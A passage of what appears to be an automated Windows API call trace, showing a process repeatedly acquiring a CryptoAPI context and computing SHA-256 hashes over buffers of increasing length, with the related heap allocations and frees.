dwFlags=0x0) returned 1 [0148.012] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821fd0) returned 1 [0148.013] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.013] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xfc0, dwFlags=0x0) returned 1 [0148.013] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b550 [0148.013] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.013] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0148.013] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822fd0) returned 1 [0148.013] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.013] CryptHashData (hHash=0x332b7a50, pbData=0x32e4ee50, dwDataLen=0xfe0, dwFlags=0x0) returned 1 [0148.013] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bca0 [0148.014] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0148.014] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0148.014] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823ad0) returned 1 [0148.014] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.014] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x1000, dwFlags=0x0) returned 1 [0148.014] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b5b0 [0148.014] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.014] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0148.014] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4ee50 | out: hHeap=0x2150000) returned 1 [0148.014] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32e4ee50 [0148.014] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338220d0) returned 1 [0148.015] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.015] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x20, dwFlags=0x0) returned 1 [0148.015] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bd30 [0148.015] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.015] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0148.015] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338220d0) returned 1 [0148.016] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.016] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x40, dwFlags=0x0) returned 1 [0148.016] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bbe0 [0148.016] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.016] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0148.016] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338235d0) returned 1 [0148.017] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.017] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0x60, dwFlags=0x0) returned 1 [0148.017] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b910 [0148.017] CryptDestroyHash (hHash=0x332b7970) returned 1 [0148.017] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0148.017] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823bd0) returned 1 [0148.017] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.017] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x80, dwFlags=0x0) returned 1 [0148.017] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bd60 [0148.017] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.018] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0148.018] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338235d0) returned 1 [0148.018] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.018] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0148.018] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b7c0 [0148.018] CryptDestroyHash (hHash=0x332b7970) returned 1 [0148.018] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0148.018] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0148.019] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.019] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0148.019] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b6d0 [0148.019] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.019] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0148.019] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ed0) returned 1 [0148.019] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.020] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0148.020] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b3a0 [0148.020] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.020] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0148.020] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338239d0) returned 1 [0148.020] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.020] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x100, dwFlags=0x0) returned 1 [0148.020] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b580 [0148.020] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.021] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0148.021] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338222d0) returned 1 [0148.021] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.021] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x120, dwFlags=0x0) returned 1 [0148.021] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b7f0 [0148.021] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.021] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0148.021] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0148.022] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.022] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x140, dwFlags=0x0) returned 1 [0148.022] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b940 [0148.022] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.022] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0148.022] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822bd0) returned 1 [0148.022] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.022] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x160, dwFlags=0x0) returned 1 [0148.022] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b3d0 [0148.023] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.023] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0148.023] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338227d0) returned 1 [0148.023] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.023] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0x180, dwFlags=0x0) returned 1 [0148.023] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b850 [0148.023] CryptDestroyHash (hHash=0x332b7970) returned 1 [0148.023] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0148.023] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338233d0) returned 1 [0148.024] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.024] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0148.024] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b400 [0148.024] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.024] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0148.024] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0148.024] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.024] CryptHashData (hHash=0x332b77b0, pbData=0x32e4ee50, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0148.025] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bdf0 [0148.025] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0148.025] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0148.025] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ad0) returned 1 [0148.025] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.025] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0148.025] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5be20 [0148.025] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.025] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0148.025] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821dd0) returned 1 [0148.026] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.026] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x200, dwFlags=0x0) returned 1 [0148.026] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b9d0 [0148.026] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.026] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0148.026] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ed0) returned 1 [0148.026] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.026] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x220, dwFlags=0x0) returned 1 [0148.026] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b5e0 [0148.026] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.027] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0148.027] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821ed0) returned 1 [0148.027] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.027] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x240, dwFlags=0x0) returned 1 [0148.027] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5be50 [0148.027] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.027] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0148.027] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338238d0) returned 1 [0148.028] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.028] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x260, dwFlags=0x0) returned 1 [0148.028] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b610 [0148.028] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.028] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0148.028] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0148.028] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.028] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x280, dwFlags=0x0) returned 1 [0148.028] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5beb0 [0148.028] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.028] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0148.028] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821dd0) returned 1 [0148.029] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.029] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0148.029] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b640 [0148.029] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.029] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0148.029] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0148.030] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.030] CryptHashData (hHash=0x332b7890, pbData=0x32e4ee50, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0148.030] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b670 [0148.030] CryptDestroyHash (hHash=0x332b7890) returned 1 [0148.030] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0148.030] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338229d0) returned 1 [0148.030] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.030] CryptHashData (hHash=0x332b7900, pbData=0x32e4ee50, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0148.030] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ba90 [0148.030] CryptDestroyHash (hHash=0x332b7900) returned 1 [0148.030] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0148.031] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338231d0) returned 1 [0148.031] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.031] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x300, dwFlags=0x0) returned 1 [0148.031] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b700 [0148.031] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.031] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0148.031] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0148.032] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.032] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x320, dwFlags=0x0) returned 1 [0148.032] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b730 [0148.032] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.032] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0148.032] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338236d0) returned 1 [0148.032] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.032] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x340, dwFlags=0x0) returned 1 [0148.032] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b880 [0148.032] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.033] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0148.033] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823ad0) returned 1 [0148.033] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.033] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x360, dwFlags=0x0) returned 1 [0148.033] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b970 [0148.033] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.033] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0148.033] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0148.034] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.034] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x380, dwFlags=0x0) returned 1 [0148.034] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ba00 [0148.034] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.034] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0148.034] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338229d0) returned 1 [0148.034] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.034] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0148.034] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ba30 [0148.034] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.035] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0148.035] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821fd0) returned 1 [0148.035] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.035] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0148.035] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bac0 [0148.035] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.035] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0148.035] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822fd0) returned 1 [0148.036] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.036] CryptHashData (hHash=0x332b7a50, pbData=0x32e4ee50, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0148.036] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5baf0 [0148.036] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0148.036] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0148.036] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823ad0) returned 1 [0148.036] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.036] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x400, dwFlags=0x0) returned 1 [0148.036] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bb20 [0148.036] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.037] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0148.037] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338220d0) returned 1 [0148.037] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.037] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x420, dwFlags=0x0) returned 1 [0148.037] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5c1b0 [0148.037] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.037] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0148.037] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338220d0) returned 1 [0148.038] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.038] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x440, dwFlags=0x0) returned 1 [0148.038] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5c180 [0148.038] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.038] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0148.038] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338235d0) returned 1 [0148.038] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.038] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0x460, dwFlags=0x0) returned 1 [0148.039] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5c090 [0148.039] CryptDestroyHash (hHash=0x332b7970) returned 1 [0148.039] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0148.039] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823bd0) returned 1 [0148.039] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.039] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x480, dwFlags=0x0) returned 1 [0148.039] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5c1e0 [0148.039] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.039] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0148.039] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338235d0) returned 1 [0148.040] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, 